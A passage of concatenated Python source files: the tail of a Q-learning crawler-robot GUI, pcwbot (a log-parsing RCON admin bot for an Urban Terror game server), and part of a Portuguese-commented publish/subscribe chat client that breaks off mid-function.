self.canvas.create_text(x + length / 2, y + 10, text='angle')
self.canvas.create_text(x - 30, y - length / 2, text='velocity')
self.canvas.create_text(x - 60, y - length / 4, text='Blue = kickLeft')
self.canvas.create_text(x - 60, y - length / 4 + 20, text='Red = kickRight')
self.canvas.create_text(x - 60, y - length / 4 + 40, text='White = doNothing')
angleDelta = (angleMax - angleMin) / 100
velDelta = (velMax - velMin) / 100
for i in range(100):
angle = angleMin + i * angleDelta
for j in range(100):
vel = velMin + j * velDelta
state = self.robotEnvironment.getState(angle, vel)
max, argMax = None, None
if not self.learner.seenState(state):
argMax = 'unseen'
else:
for action in ('kickLeft', 'kickRight', 'doNothing'):
qVal = self.learner.getQValue(state, action)
if max == None or qVal > max:
max, argMax = qVal, action
if argMax != 'unseen':
if argMax == 'kickLeft':
color = 'blue'
elif argMax == 'kickRight':
color = 'red'
elif argMax == 'doNothing':
color = 'white'
dx = length / 100.0
dy = length / 100.0
x0, y0 = x + i * dx, y - j * dy
self.canvas.create_rectangle(x0, y0, x0 + dx, y0 + dy, fill=color)
def run(self):
self.stepCount = 0
self.learner.startEpisode()
while True:
minSleep = .01
tm = max(minSleep, self.tickTime)
time.sleep(tm)
self.stepsToSkip = int(tm / self.tickTime) - 1
if not self.running:
self.stopped = True
return
for i in range(self.stepsToSkip):
self.step()
self.stepsToSkip = 0
self.step()
# self.robot.draw()
self.learner.stopEpisode()
def start(self):
self.win.mainloop()
def run():
global root
root = tkinter.Tk()
root.title('Crawler GUI')
root.resizable(0, 0)
# root.mainloop()
app = Application(root)
def update_gui():
app.robot.draw(app.stepCount, app.tickTime)
root.after(10, update_gui)
update_gui()
root.protocol('WM_DELETE_WINDOW', app.exit)
try:
app.start()
except:
app.exit()
|
pcwbot.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
pcwbot - An automated game server bot
http://www.spunkybot.de/pcwbot
Author: Alexander Kress
This program is released under the MIT License. See LICENSE for more details.
## About ##
pcwbot is a scaled down version of Spunky Bot, the lightweight game server
administration bot and RCON tool, which is optimized for private war server.
## Configuration ##
Modify the UrT server config as follows:
* seta g_logsync "1"
Modify the configuration file 'settings.conf'
Run the bot: python pcwbot.py
"""
__version__ = '0.9.10'
### IMPORTS
import re
import time
import sqlite3
import textwrap
import ConfigParser
import socket
from Queue import Queue
from threading import Thread
from threading import RLock
class Q3Player(object):
"""
Q3Player class
"""
def __init__(self, num, name, frags, ping, address=None, bot=-1):
"""
create a new instance of Q3Player
"""
self.num = num
self.name = name
self.frags = frags
self.ping = ping
self.address = address
self.bot = bot
class PyQuake3(object):
"""
PyQuake3 class - Python Quake 3 Library
http://misc.slowchop.com/misc/wiki/pyquake3
Copyright (C) 2006-2007 Gerald Kaszuba
"""
packet_prefix = '\xff' * 4
player_reo = re.compile(r'^(\d+) (\d+) "(.*)"')
rcon_password = None
port = None
address = None
players = None
values = None
def __init__(self, server, rcon_password=''):
"""
create a new instance of PyQuake3
"""
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.set_server(server)
self.set_rcon_password(rcon_password)
def set_server(self, server):
"""
set IP address and port and connect to socket
"""
try:
self.address, self.port = server.split(':')
except:
raise ValueError('Server address format must be: "address:port"')
self.port = int(self.port)
self.sock.connect((self.address, self.port))
def get_address(self):
"""
get IP address and port
"""
return '%s:%s' % (self.address, self.port)
def set_rcon_password(self, rcon_password):
"""
set RCON password
"""
self.rcon_password = rcon_password
def send_packet(self, data):
"""
send packet
"""
self.sock.send('%s%s\n' % (self.packet_prefix, data))
def recv(self, timeout=1):
"""
receive packets
"""
self.sock.settimeout(timeout)
try:
return self.sock.recv(8192)
except socket.error, err:
raise Exception('Error receiving the packet: %s' % err[1])
def command(self, cmd, timeout=1, retries=5):
"""
send command and receive response
"""
while retries:
self.send_packet(cmd)
try:
data = self.recv(timeout)
except Exception:
data = None
if data:
return self.parse_packet(data)
retries -= 1
raise Exception('Server response timed out')
def rcon(self, cmd):
"""
send RCON command
"""
r_cmd = self.command('rcon "%s" %s' % (self.rcon_password, cmd))
if r_cmd[1] == 'No rconpassword set on the server.\n' or r_cmd[1] == 'Bad rconpassword.\n':
raise Exception(r_cmd[1][:-1])
return r_cmd
def parse_packet(self, data):
"""
parse the received packet
"""
if data.find(self.packet_prefix) != 0:
raise Exception('Malformed packet')
first_line_length = data.find('\n')
if first_line_length == -1:
raise Exception('Malformed packet')
response_type = data[len(self.packet_prefix):first_line_length]
response_data = data[first_line_length + 1:]
return response_type, response_data
def parse_status(self, data):
"""
parse the response message and return a list
"""
split = data[1:].split('\\')
values = dict(zip(split[::2], split[1::2]))
# if there are \n's in one of the values, it's the list of players
for var, val in values.items():
pos = val.find('\n')
if pos == -1:
continue
split = val.split('\n', 1)
values[var] = split[0]
self.parse_players(split[1])
return values
def parse_players(self, data):
"""
parse player information - name, frags and ping
"""
self.players = []
for player in data.split('\n'):
if not player:
continue
match = self.player_reo.match(player)
if not match:
print 'couldnt match', player
continue
frags, ping, name = match.groups()
self.players.append(Q3Player(1, name, frags, ping))
def update(self):
"""
get status
"""
data = self.command('getstatus')[1]
self.values = self.parse_status(data)
def rcon_update(self):
"""
perform RCON status update
"""
data = self.rcon('status')[1]
lines = data.split('\n')
players = lines[3:]
self.players = []
for ply in players:
while ply.find(' ') != -1:
ply = ply.replace(' ', ' ')
while ply.find(' ') == 0:
ply = ply[1:]
if ply == '':
continue
ply = ply.split(' ')
try:
self.players.append(Q3Player(int(ply[0]), ply[3], int(ply[1]), int(ply[2]), ply[5]))
except (IndexError, ValueError):
continue
### CLASS Rcon ###
class Rcon(object):
"""
RCON class, version 1.0.7
"""
def __init__(self, host, port, passwd):
"""
create a new instance of Rcon
@param host: The server IP address
@type host: String
@param port: The server port
@type port: String
@param passwd: The RCON password
@type passwd: String
"""
self.live = False
self.quake = PyQuake3("%s:%s" % (host, port), passwd)
self.queue = Queue()
self.rcon_lock = RLock()
# start Thread
self.processor = Thread(target=self.process)
self.processor.setDaemon(True)
self.processor.start()
def push(self, msg):
"""
execute RCON command
@param msg: The RCON command
@type msg: String
"""
if self.live:
with self.rcon_lock:
self.queue.put(msg)
def go_live(self):
"""
go live
"""
self.live = True
def get_rcon_output(self, value):
"""
get RCON output for value
"""
if self.live:
with self.rcon_lock:
return self.quake.rcon(value)
def process(self):
"""
Thread process
"""
while 1:
if not self.queue.empty():
if self.live:
with self.rcon_lock:
try:
command = self.queue.get()
if command != 'status':
self.quake.rcon(command)
else:
self.quake.rcon_update()
except Exception:
pass
time.sleep(.33)
### CLASS Log Parser ###
class LogParser(object):
"""
log file parser
"""
def __init__(self, config_file):
"""
create a new instance of LogParser
@param config_file: The full path of the bot configuration file
@type config_file: String
"""
# RCON commands for the different admin roles
self.admin_cmds = ['cyclemap', 'exec', 'force', 'kick', 'list', 'map', 'password', 'reload', 'setnextmap', 'swapteams', 'veto']
self.headadmin_cmds = self.admin_cmds + ['leveltest', 'putgroup', 'ungroup']
# alphabetic sort of the commands
self.admin_cmds.sort()
self.headadmin_cmds.sort()
self.config_file = config_file
config = ConfigParser.ConfigParser()
config.read(config_file)
print "- Imported config file '%s' successful." % config_file
games_log = config.get('server', 'log_file')
# open game log file
self.log_file = open(games_log, 'r')
# go to the end of the file
self.log_file.seek(0, 2)
print "- Parsing games log file '%s' successful." % games_log
self.game = None
self.players_lock = RLock()
# enable/disable option to get Head Admin by checking existence of head admin in database
curs.execute("SELECT COUNT(*) FROM `admins` WHERE `admin_role` = 100")
self.iamgod = True if curs.fetchone()[0] < 1 else False
# start parsing the games logfile
self.read_log()
def read_log(self):
"""
read the logfile
"""
# create instance of Game
self.game = Game(self.config_file)
while self.log_file:
line = self.log_file.readline()
if line:
self.parse_line(line)
else:
if not self.game.live:
self.game.go_live()
time.sleep(.125)
def parse_line(self, string):
"""
parse the logfile and search for specific action
"""
line = string[7:]
tmp = line.split(":", 1)
line = tmp[1].strip() if len(tmp) > 1 else tmp[0].strip()
try:
action = tmp[0].strip()
if action == 'ClientUserinfo':
self.handle_userinfo(line)
elif action == 'ClientDisconnect':
self.handle_disconnect(line)
elif action == 'say':
self.handle_say(line)
except (IndexError, KeyError):
pass
except Exception, err:
print "%s: %s" % (err.__class__.__name__, err)
def explode_line(self, line):
"""
explode line
"""
arr = line.lstrip().lstrip('\\').split('\\')
key = True
key_val = None
values = {}
for item in arr:
if key:
key_val = item
key = False
else:
values[key_val.rstrip()] = item.rstrip()
key_val = None
key = True
return values
def handle_userinfo(self, line):
"""
handle player user information, auto-kick known cheater ports or guids
"""
with self.players_lock:
player_num = int(line[:2].strip())
line = line[2:].lstrip("\\").lstrip()
values = self.explode_line(line)
name = re.sub(r"\s+", "", values['name']) if 'name' in values else "UnnamedPlayer"
ip_port = values['ip'] if 'ip' in values else "0.0.0.0:0"
guid = values['cl_guid'] if 'cl_guid' in values else "None"
ip_address = ip_port.split(":")[0].strip()
if player_num not in self.game.players:
player = Player(player_num, ip_address, guid, name)
self.game.add_player(player)
if self.game.players[player_num].get_guid() != guid:
self.game.players[player_num].set_guid(guid)
if self.game.players[player_num].get_name() != name:
self.game.players[player_num].set_name(name)
def handle_disconnect(self, line):
"""
handle player disconnect
"""
with self.players_lock:
player_num = int(line)
del self.game.players[player_num]
def player_found(self, user):
"""
return True and instance of player or False and message text
"""
victim = None
name_list = []
append = name_list.append
for player in self.game.players.itervalues():
player_name = player.get_name()
player_num = player.get_player_num()
if (user.upper() == player_name.upper() or user == str(player_num)) and player_num != 1022:
victim = player
name_list = ["^3%s [^2%d^3]" % (player_name, player_num)]
break
elif user.upper() in player_name.upper() and player_num != 1022:
victim = player
append("^3%s [^2%d^3]" % (player_name, player_num))
if len(name_list) == 0:
return False, None, "^3No Player found"
elif len(name_list) > 1:
return False, None, "^7Players matching %s: ^3%s" % (user, ', '.join(name_list))
else:
return True, victim, None
def map_found(self, map_name):
"""
return True and map name or False and message text
"""
map_list = []
append = map_list.append
for maps in self.game.get_all_maps():
if map_name.lower() == maps or ('ut4_%s' % map_name.lower()) == maps:
append(maps)
break
elif map_name.lower() in maps:
append(maps)
if not map_list:
return False, None, "^3Map not found"
elif len(map_list) > 1:
return False, None, "^7Maps matching %s: ^3%s" % (map_name, ', '.join(map_list))
else:
return True, map_list[0], None
def handle_say(self, line):
"""
handle say commands
"""
with self.players_lock:
line = line.strip()
try:
divider = line.split(": ", 1)
number = divider[0].split(" ", 1)[0]
cmd = divider[1].split()[0]
sar = {'player_num': int(number), 'command': cmd}
except IndexError:
sar = {'player_num': 1022, 'command': ''}
if sar['command'] == '!help' or sar['command'] == '!h':
if self.game.players[sar['player_num']].get_admin_role() == 40:
self.game.rcon_tell(sar['player_num'], "^7Admin commands: ^3%s" % ", ".join(self.admin_cmds))
elif self.game.players[sar['player_num']].get_admin_role() > 80:
self.game.rcon_tell(sar['player_num'], "^7Head Admin commands: ^3%s" % ", ".join(self.headadmin_cmds))
## admin level 40
# force - force a player to the given team
elif sar['command'] == '!force' and self.game.players[sar['player_num']].get_admin_role() >= 40:
if line.split(sar['command'])[1]:
arg = line.split(sar['command'])[1].split()
if len(arg) > 1:
user = arg[0]
team = arg[1]
team_dict = {'red': 'red', 'r': 'red', 're': 'red',
'blue': 'blue', 'b': 'blue', 'bl': 'blue', 'blu': 'blue',
'spec': 'spectator', 'spectator': 'spectator', 's': 'spectator', 'sp': 'spectator', 'spe': 'spectator',
'green': 'green'}
found, victim, msg = self.player_found(user)
if not found:
self.game.rcon_tell(sar['player_num'], msg)
else:
if team in team_dict:
victim_player_num = victim.get_player_num()
self.game.rcon_forceteam(victim_player_num, team_dict[team])
else:
self.game.rcon_tell(sar['player_num'], "^7Usage: !force <name> <blue/red/spec>")
else:
self.game.rcon_tell(sar['player_num'], "^7Usage: !force <name> <blue/red/spec>")
else:
self.game.rcon_tell(sar['player_num'], "^7Usage: !force <name> <blue/red/spec>")
# kick - kick a player
elif (sar['command'] == '!kick' or sar['command'] == '!k') and self.game.players[sar['player_num']].get_admin_role() >= 40:
if line.split(sar['command'])[1]:
user = line.split(sar['command'])[1].strip()
found, victim, msg = self.player_found(user)
if not found:
self.game.rcon_tell(sar['player_num'], msg)
else:
if sar['player_num'] != victim.get_player_num():
self.game.kick_player(victim.get_player_num())
else:
self.game.rcon_tell(sar['player_num'], "^7You cannot kick yourself")
else:
self.game.rcon_tell(sar['player_num'], "^7Usage: !kick <name>")
# list - list all connected players
elif sar['command'] == '!list' and self.game.players[sar['player_num']].get_admin_role() >= 40:
msg = "^7Current players: %s" % ", ".join(["^3%s [^2%d^3]" % (player.get_name(), player.get_player_num()) for player in self.game.players.itervalues() if player.get_player_num() != 1022])
self.game.rcon_tell(sar['player_num'], msg)
# veto - stop voting process
elif sar['command'] == '!veto' and self.game.players[sar['player_num']].get_admin_role() >= 40:
self.game.send_rcon('veto')
# reload
elif sar['command'] == '!reload' and self.game.players[sar['player_num']].get_admin_role() >= 40:
self.game.send_rcon('reload')
# password - set private server password
elif sar['command'] == '!password' and self.game.players[sar['player_num']].get_admin_role() >= 40:
if line.split(sar['command'])[1]:
arg = line.split(sar['command'])[1].strip()
self.game.send_rcon('g_password %s' % arg)
self.game.rcon_tell(sar['player_num'], "^7Password set to '%s' - Server is private" % arg)
else:
self.game.send_rcon('g_password ""')
self.game.rcon_tell(sar['player_num'], "^7Password removed - Server is public")
# exec - execute config file
elif sar['command'] == '!exec' and self.game.players[sar['player_num']].get_admin_role() >= 40:
if line.split(sar['command'])[1]:
arg = line.split(sar['command'])[1].strip()
self.game.send_rcon('exec %s' % arg)
else:
self.game.rcon_tell(sar['player_num'], "^7Usage: !exec <filename>")
# map - load given map
elif sar['command'] == '!map' and self.game.players[sar['player_num']].get_admin_role() >= 40:
if line.split(sar['command'])[1]:
arg = line.split(sar['command'])[1].strip()
found, newmap, msg = self.map_found(arg)
if not found:
self.game.rcon_tell(sar['player_num'], msg)
else:
self.game.send_rcon('map %s' % newmap)
else:
self.game.rcon_tell(sar['player_num'], "^7Usage: !map <ut4_name>")
# setnextmap - set the given map as nextmap
elif sar['command'] == '!setnextmap' and self.game.players[sar['player_num']].get_admin_role() >= 40:
if line.split(sar['command'])[1]:
arg = line.split(sar['command'])[1].strip()
found, nextmap, msg = self.map_found(arg)
if not found:
self.game.rcon_tell(sar['player_num'], msg)
else:
self.game.send_rcon('g_nextmap %s' % nextmap)
else:
self.game.rcon_tell(sar['player_num'], "^7Usage: !setnextmap <ut4_name>")
# cyclemap - start next map in rotation
elif sar['command'] == '!cyclemap' and self.game.players[sar['player_num']].get_admin_role() >= 40:
self.game.send_rcon('cyclemap')
# swapteams - swap current teams
elif sar['command'] == '!swapteams' and self.game.players[sar['player_num']].get_admin_role() >= 80:
self.game.send_rcon('swapteams')
## head admin level 100
# leveltest
elif (sar['command'] == '!leveltest' or sar['command'] == '!lt') and self.game.players[sar['player_num']].get_admin_role() == 100:
if line.split(sar['command'])[1]:
user = line.split(sar['command'])[1].strip()
found, victim, msg = self.player_found(user)
if not found:
self.game.rcon_tell(sar['player_num'], msg)
else:
self.game.rcon_tell(sar['player_num'], "^3Level %s [^2%d^3]: ^7%s" % (victim.get_name(), victim.get_admin_role(), victim.roles[victim.get_admin_role()]))
else:
self.game.rcon_tell(sar['player_num'], "^3Level %s [^2%d^3]: ^7%s" % (self.game.players[sar['player_num']].get_name(), self.game.players[sar['player_num']].get_admin_role(), self.game.players[sar['player_num']].roles[self.game.players[sar['player_num']].get_admin_role()]))
# putgroup - add a client to a group
elif sar['command'] == '!putgroup' and self.game.players[sar['player_num']].get_admin_role() == 100:
if line.split(sar['command'])[1]:
arg = line.split(sar['command'])[1].split()
if len(arg) > 1:
user = arg[0]
right = arg[1]
found, victim, msg = self.player_found(user)
if not found:
self.game.rcon_tell(sar['player_num'], msg)
else:
if victim.get_registered_user():
new_role = victim.get_admin_role()
else:
# register new user in DB and set role to 1
victim.register_user_db(role=1)
new_role = 1
if right == "user":
self.game.rcon_tell(sar['player_num'], "^3%s put in group User" % victim.get_name())
new_role = 1
elif right == "admin":
self.game.rcon_tell(sar['player_num'], "^3%s added as ^7Admin" % victim.get_name())
new_role = 40
else:
self.game.rcon_tell(sar['player_num'], "^3Sorry, you cannot put %s in group <%s>" % (victim.get_name(), right))
victim.update_db_admin_role(role=new_role)
else:
self.game.rcon_tell(sar['player_num'], "^7Usage: !putgroup <name> <group>")
else:
self.game.rcon_tell(sar['player_num'], "^7Usage: !putgroup <name> <group>")
# ungroup - remove the admin level from a player
elif sar['command'] == '!ungroup' and self.game.players[sar['player_num']].get_admin_role() == 100:
if line.split(sar['command'])[1]:
user = line.split(sar['command'])[1].strip()
found, victim, msg = self.player_found(user)
if not found:
self.game.rcon_tell(sar['player_num'], msg)
else:
if 1 < victim.get_admin_role() < 100:
self.game.rcon_tell(sar['player_num'], "^3%s put in group User" % victim.get_name())
victim.update_db_admin_role(role=1)
else:
self.game.rcon_tell(sar['player_num'], "^3Sorry, you cannot put %s in group User" % victim.get_name())
else:
self.game.rcon_tell(sar['player_num'], "^7Usage: !ungroup <name>")
## iamgod
# iamgod - register user as Head Admin
elif sar['command'] == '!iamgod':
if self.iamgod:
if not self.game.players[sar['player_num']].get_registered_user():
# register new user in DB and set admin role to 100
self.game.players[sar['player_num']].register_user_db(role=100)
else:
self.game.players[sar['player_num']].update_db_admin_role(role=100)
self.iamgod = False
self.game.rcon_tell(sar['player_num'], "^7You are registered as ^6Head Admin")
## unknown command
elif sar['command'].startswith('!') and len(sar['command']) > 1 and self.game.players[sar['player_num']].get_admin_role() >= 40:
if sar['command'].lstrip('!') in self.headadmin_cmds:
self.game.rcon_tell(sar['player_num'], "^7Insufficient privileges to use command ^3%s" % sar['command'])
### CLASS Player ###
class Player(object):
"""
Player class
"""
teams = {0: "green", 1: "red", 2: "blue", 3: "spectator"}
roles = {0: "Guest", 1: "User", 40: "Admin", 100: "Head Admin"}
def __init__(self, player_num, ip_address, guid, name):
"""
create a new instance of Player
"""
self.player_num = player_num
self.guid = guid
self.name = name.replace(' ', '')
self.registered_user = False
self.admin_role = 0
self.address = ip_address
self.team = 3
self.prettyname = self.name
# remove color characters from name
for item in xrange(10):
self.prettyname = self.prettyname.replace('^%d' % item, '')
def check_database(self):
# check admins table
values = (self.guid,)
curs.execute("SELECT `admin_role` FROM `admins` WHERE `guid` = ?", values)
result = curs.fetchone()
if result:
self.admin_role = result[0]
self.registered_user = True
else:
self.registered_user = False
def register_user_db(self, role=1):
if not self.registered_user:
values = (self.guid, self.prettyname, self.address, role)
curs.execute("INSERT INTO `admins` (`guid`,`name`,`ip_address`,`admin_role`) VALUES (?,?,?,?)", values)
conn.commit()
self.admin_role = role
def update_db_admin_role(self, role):
values = (role, self.guid)
curs.execute("UPDATE `admins` SET `admin_role` = ? WHERE `guid` = ?", values)
conn.commit()
# overwrite admin role in game, no reconnect of player required
self.set_admin_role(role)
def set_name(self, name):
self.name = name.replace(' ', '')
def get_name(self):
return self.name
def set_guid(self, guid):
self.guid = guid
def get_guid(self):
return self.guid
def get_player_num(self):
return self.player_num
def get_registered_user(self):
return self.registered_user
def set_admin_role(self, role):
self.admin_role = role
def get_admin_role(self):
return self.admin_role
### CLASS Game ###
class Game(object):
"""
Game class
"""
def __init__(self, config_file):
"""
create a new instance of Game
@param config_file: The full path of the bot configuration file
@type config_file: String
"""
self.all_maps_list = []
self.players = {}
self.live = False
game_cfg = ConfigParser.ConfigParser()
game_cfg.read(config_file)
self.rcon_handle = Rcon(game_cfg.get('server', 'server_ip'), game_cfg.get('server', 'server_port'), game_cfg.get('server', 'rcon_password'))
# add pcwbot as player 'World' to the game
world = Player(1022, '127.0.0.1', 'NONE', 'World')
self.add_player(world)
print "- Added pcwbot successful to the game.\n"
print "pcwbot is running until you are closing this session or pressing CTRL + C to abort this process."
print "*** Note: Use the provided initscript to run pcwbot as daemon ***\n"
def send_rcon(self, command):
"""
send RCON command
@param command: The RCON command
@type command: String
"""
if self.live:
self.rcon_handle.push(command)
def rcon_tell(self, player_num, msg):
"""
tell message to a specific player
@param player_num: The player number
@type player_num: Integer
@param msg: The message to display in private chat
@type msg: String
"""
lines = textwrap.wrap(msg, 128)
for line in lines:
self.send_rcon('tell %d %s' % (player_num, line))
def rcon_forceteam(self, player_num, team):
"""
force player to given team
@param player_num: The player number
@type player_num: Integer
@param team: The team (red, blue, spectator)
@type team: String
"""
self.send_rcon('forceteam %d %s' % (player_num, team))
def kick_player(self, player_num):
"""
kick player
@param player_num: The player number
@type player_num: Integer
"""
self.send_rcon('kick %d' % player_num)
def go_live(self):
"""
go live
"""
self.live = True
self.rcon_handle.go_live()
self.set_all_maps()
def set_all_maps(self):
"""
set a list of all available maps
"""
all_maps = self.rcon_handle.get_rcon_output("dir map bsp")[1].split()
all_maps_list = [maps.replace("/", "").replace(".bsp", "") for maps in all_maps if maps.startswith("/")]
pk3_list = self.rcon_handle.get_rcon_output("fdir *.pk3")[1].split()
all_pk3_list = [maps.replace("/", "").replace(".pk3", "").replace(".bsp", "") for maps in pk3_list if maps.startswith("/ut4_")]
all_together = list(set(all_maps_list + all_pk3_list))
all_together.sort()
if all_together:
self.all_maps_list = all_together
def get_all_maps(self):
"""
get a list of all available maps
"""
return self.all_maps_list
def add_player(self, player):
"""
add a player to the game
@param player: The instance of the player
@type player: Instance
"""
self.players[player.get_player_num()] = player
player.check_database()
### Main ###
print "\n\nStarting pcwbot %s:" % __version__
# connect to database
conn = sqlite3.connect('./data.sqlite')
curs = conn.cursor()
# create tables if not exists
curs.execute('CREATE TABLE IF NOT EXISTS admins (id INTEGER PRIMARY KEY NOT NULL, guid TEXT NOT NULL, name TEXT NOT NULL, ip_address TEXT NOT NULL, admin_role INTEGER DEFAULT 1)')
print "- Connected to database 'data.sqlite' successful."
# create instance of LogParser
LogParser('./settings.conf')
# close database connection
conn.close()
|
client.py | import socket
import select
import threading
import json
import sys
import traceback
import os
import random
from clientInterface import ClientInterface
from constants import CREATE_CHANNEL, SUBSCRIBE_CHANNEL, UNSUBSCRIBE_CHANNEL, SHOW_MY_SUBS, PUBLISH_CHANNEL, SHOW_MY_CHANNELS, SHOW_ALL_CHANNELS
from constants import LOGIN, LOGOUT, CREATE_ACCOUNT, DELETE_ACCOUNT, EXIT
from constants import HOME_SCR, CREATE_ACCOUNT_SCR, DELETE_ACCOUNT_SCR, LOGIN_SCR, PRINCIPAL_MENU_SCR
class Client:
def __init__(self, serverHost='localhost', serverPort = 5000):
self.serverHost = serverHost #Endereço do servidor
self.serverPort = serverPort #Porta do servidor
self.sock = None #Sock utilizado para se comunicar com o servidor
self.clientView = ClientInterface() #Inicializa a classe responsável pela interface da aplicação
self.userName = '' #Guarda o user name do usuário
self.password = '' #Guarda a senha do usuário
self.stopWorkers = False #Variável chave para parar todas as threads trabalhadoras
self.channelMessages = [] #Guarda as menssagens recebidas de cada canal
self.lock = threading.Lock() #Inicializa o lock
self.start() #Adquire o socket e se conecta com o servidor
def start(self):
"""
Cria o socket do cliente e o conecta com o servidor.
"""
self.sock = socket.socket()
try:
self.sock.connect((self.serverHost, self.serverPort)) #Abertura da conexão com o servidor
except Exception as e:
sys.exit(1)
def stop(self):
"""
Fecha o socket do cliente.
"""
self.sock.close()
def finishBusiness(self):
"""
Termina a threads runChannelListener, responsável por ouvir as mensagens recebidas dos diferentes canais.
"""
self.stopWorkers = True
def recvByMethod(self, notify = False):
"""
Aguarda pela mensagem que apresenta a tag de interesse
:param notify: especifica se a mensagem é uma notificação ou não
:return mensagem que apresenta a tag de interesse
"""
size = 1024
peeked_msg = self.sock.recv(size, socket.MSG_PEEK)
peeked_response = json.loads(peeked_msg)
while(not notify and (peeked_response['method'] == 'notifySubscriber')):
peeked_msg = self.sock.recv(size, socket.MSG_PEEK)
peeked_response = json.loads(peeked_msg)
while(notify and (peeked_response['method'] != 'notifySubscriber')):
peeked_msg = self.sock.recv(size, socket.MSG_PEEK)
peeked_response = json.loads(peeked_msg)
msg_w_my_method = self.sock.recv(1024)
return msg_w_my_method
def handlerServerRequest(self, method, userInput):
"""
Dado o método e o input do cliente, gera a mensagem de requisição para o servidor e envia para o mesmo.
:param method: comando a ser executado.
:param userInput: entradas digitadas pelo cliente.
:return mensagem de resposta do servidor.
"""
methods = {CREATE_ACCOUNT: 'createAccount', DELETE_ACCOUNT: 'deleteAccount', LOGIN:'authAccount', LOGOUT:'logout', CREATE_CHANNEL:'createChannel', SUBSCRIBE_CHANNEL: 'subscribeChannel', UNSUBSCRIBE_CHANNEL:'unsubscribeChannel', SHOW_MY_SUBS:'showMySubscriptions', PUBLISH_CHANNEL:'publishChannel', SHOW_MY_CHANNELS:'showMyOwnChannels', SHOW_ALL_CHANNELS:'showAllChannels'}
if(method in (CREATE_ACCOUNT, DELETE_ACCOUNT, LOGIN)):
userName, password = userInput
request = {'method':methods[method],'data':{'userName': userName,'password':password}}
elif(method == PUBLISH_CHANNEL):
channelName = userInput[1][0]
message = userInput[1][1]
request = {'method':methods[method],'data':{'userName': self.userName,'password': self.password, 'channelName': channelName, 'message': message}}
elif(method in (SUBSCRIBE_CHANNEL, UNSUBSCRIBE_CHANNEL, CREATE_CHANNEL)):
channelName = userInput[1]
request = {'method':methods[method], 'data': {'userName': self.userName,'password': self.password,'channelName': channelName }}
elif(method in (LOGOUT, SHOW_MY_SUBS, SHOW_MY_CHANNELS)):
request = {'method':methods[method], 'data': {'userName': self.userName,'password': self.password}}
elif(method == SHOW_ALL_CHANNELS):
request = {'method':methods[method]}
request_msg = json.dumps(request, ensure_ascii=False) #Gera o json para o envio da requisição ao servidor
self.sock.send(bytes(request_msg, encoding='utf-8')) #Envio da mensagem para o servidor
response_msg = self.recvByMethod() #Recebimento da mensagem enviada pelo servidor.
response = json.loads(response_msg) #Tranformar a mensagem recebida em um dicionário.
return response
def handleServerResponse(self, method, response, userInput):
"""
Dado a resposta do servidor e o input do cliente faz as tratativas necessárias no back do cliente.
:param method: comando a ser executado
:param response: resposta retornada pelo servidor
:param userInput: possíveis entradas digitadas pelo usuário
:return void ou mensagem de retorno para a interface.
"""
#Atualiza as informação do usuário e inicia a thread resposável por escutar os diferentes canais que possuem mensagens publicadas.
if(method == LOGIN and response['status'] == 'success'):
userName, password = userInput
self.userName = userName
self.clientView.username = self.userName
self.password = password
work = threading.Thread(target= self.runChannelListener, args=())
work.daemon = True #Mata a thread filha quando a thread principal morrer.
work.start()
if(method == LOGOUT and response['status'] == 'success'):
self.finishBusiness()
def handleInterfaceCommand(self, cmd, userInput = None, response = None):
"""
Dado o comando enviado e outras possíveis informações (entrada do usuário ou resposta a requisição), trata os comandos da interface.
:param cmd: comando a ser executado.
:param userInput: entradas digitadas pelo cliente.
:param response: mensagem de resposta (dicionário).
:return void ou mensagem de resposta (dicionário) para a classe clientInterface.
"""
if(cmd == LOGIN and (response['status'] == 'success')):
self.stopWorkers = False
response = None
if(cmd == SHOW_MY_SUBS and (response['status'] == 'success')):
list_of_subs = response['data']
self.clientView.responsesToPrint.append("Canais em que você está inscrito: " + ", ".join(list_of_subs) + "\n")
if(cmd == SHOW_MY_CHANNELS and (response['status'] == 'success')):
list_of_channels = response['data']
self.clientView.responsesToPrint.append("Canais em que você é proprietário: " + ", ".join(list_of_channels) + "\n")
if(cmd == SHOW_ALL_CHANNELS and (response['status'] == 'success')):
list_of_channels = response['data']
self.clientView.responsesToPrint.append("Canais registrados no servidor: " + ", ".join(list_of_channels) + "\n")
return None
def runChannelListener(self):
"""
Representa o fluxo ouvinte do cliente que ficará atento a quaisquer atualizações dos canais inscritos.
"""
request_msg = None
try:
while True:
try:
#Recebe a mensagens dos canais
request_msg = self.recvByMethod(notify = True)
except socket.timeout as e:
pass
#Entra se receber logout ou o servidor cair
if(request_msg == b'' or self.stopWorkers):
break
if(request_msg != None):
request = json.loads(request_msg)
channelName = request['data']['channelName']
self.lock.acquire()
#Salva a mensagem recebida na lista de mensagens com aquele canal
self.channelMessages.append(channelName + ":" + request['data']['message'])
self.lock.release()
self.lock.acquire()
self.clientView.messages_queue = self.channelMessages
self.clientView.printPrincipalMenuScreen()
self.lock.release()
request_msg = None
except Exception as e:
self.sock.close()
def run(self):
"""
Executa o fluxo principal do cliente. É a partir dele e dos comandos de entrada, sendo para o servidor ou para a própria aplicação, que são tomadas certas atitudes, inclusive criar novas threads para comunicações.
"""
userInput = self.clientView.homeScreen()
while (userInput[0] != EXIT):
if(userInput[0] == CREATE_ACCOUNT):
credentials = self.clientView.createAccountScreen()
response = self.handlerServerRequest(CREATE_ACCOUNT, credentials)
self.clientView.handlerResponse(response)
elif(userInput[0] == DELETE_ACCOUNT):
credentials = self.clientView.deleteAccountScreen()
response = self.handlerServerRequest(DELETE_ACCOUNT, credentials)
self.clientView.handlerResponse(response)
elif(userInput[0] == LOGIN):
credentials = self.clientView.authScreen()
response = self.handlerServerRequest(LOGIN, credentials)
self.handleInterfaceCommand(LOGIN, response=response)
self.handleServerResponse(LOGIN, response, credentials)
self.clientView.handlerResponse(response)
elif(userInput[0] == LOGOUT):
response = self.handlerServerRequest(LOGOUT, None)
self.clientView.handlerResponse(response)
result = self.handleServerResponse(LOGOUT,response,None)
elif(userInput[0] == PUBLISH_CHANNEL):
response = self.handlerServerRequest(PUBLISH_CHANNEL, userInput)
self.clientView.handlerResponse(response)
elif(userInput[0] == SUBSCRIBE_CHANNEL):
response = self.handlerServerRequest(SUBSCRIBE_CHANNEL, userInput)
self.clientView.handlerResponse(response)
elif(userInput[0] == UNSUBSCRIBE_CHANNEL):
response = self.handlerServerRequest(UNSUBSCRIBE_CHANNEL, userInput)
self.clientView.handlerResponse(response)
elif(userInput[0] == SHOW_MY_SUBS):
response = self.handlerServerRequest(SHOW_MY_SUBS, userInput)
